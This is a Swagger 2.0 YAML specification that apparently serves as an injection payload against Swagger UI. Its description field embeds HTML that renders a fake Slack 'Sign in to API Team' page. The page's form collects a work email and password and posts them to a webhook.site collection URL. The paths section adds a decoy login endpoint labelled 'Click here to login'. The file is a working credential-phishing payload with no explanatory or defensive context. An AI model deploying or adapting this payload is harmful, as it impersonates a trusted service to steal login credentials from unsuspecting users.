swagger: '2.0'
info:
  version: 1.0.0
  title: Swagger UI
  description: '<br><table width="100%" cellspacing="0" cellpadding="0"><tr><td width="30%">&nbsp;</td><td width="40%" bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="22"><tr><td align="left"><div align="center"><img src="https://raw.githubusercontent.com/RekhanshRajput/Swagger-xss-payloads/refs/heads/main/assets/logo-slack.png" width="92" height="25" alt="slack"></div><br><font face="Segoe UI" size="4" color="#1d1c1d"><b>Sign in to </b></font><font face="Segoe UI" size="4" color="#1d1c1d"><b>API Team</b></font><br><font face="Segoe UI" size="2" color="#616061">We suggest using the email you use at work.</font><br><br><form action="https://webhook.site/REPLACE-ME" method="post"><font face="Segoe UI" size="2" color="#333333"><b>Work email</b></font><br><input type="text" name="email" size="34" placeholder="name@work-email.com"><br><br><font face="Segoe UI" size="2" color="#333333"><b>Password</b></font><br><input type="password" name="pass" size="34" placeholder="Password"><br><br><input type="image" src="https://raw.githubusercontent.com/RekhanshRajput/Swagger-xss-payloads/refs/heads/main/assets/btn-slack.png" width="100" height="29" alt="Sign In"></form></td></tr></table><table width="100%" cellspacing="0" cellpadding="3"><tr><td bgcolor="#611f69">&nbsp;</td></tr></table><table width="100%" cellspacing="0" cellpadding="8"><tr><td align="left"><font face="Segoe UI" size="1" color="#616061">Slack API Workspace &middot; Privacy &middot; Terms</font></td></tr></table></td><td width="30%">&nbsp;</td></tr></table><br>'
paths:
  /Login_Page:
    post:
      summary: Login here to continue
      description: Please provide your credentials to continue.
      parameters:
        - name: username
          in: formData
          description: The username for login
          required: true
          type: string
        - name: password
          in: formData
          description: The password for login
          required: true
          type: string
      tags:
        - Click here to login
      responses:
        '200':
          description: OK
        '400':
          description: Bad request
        '500':
          description: Server error
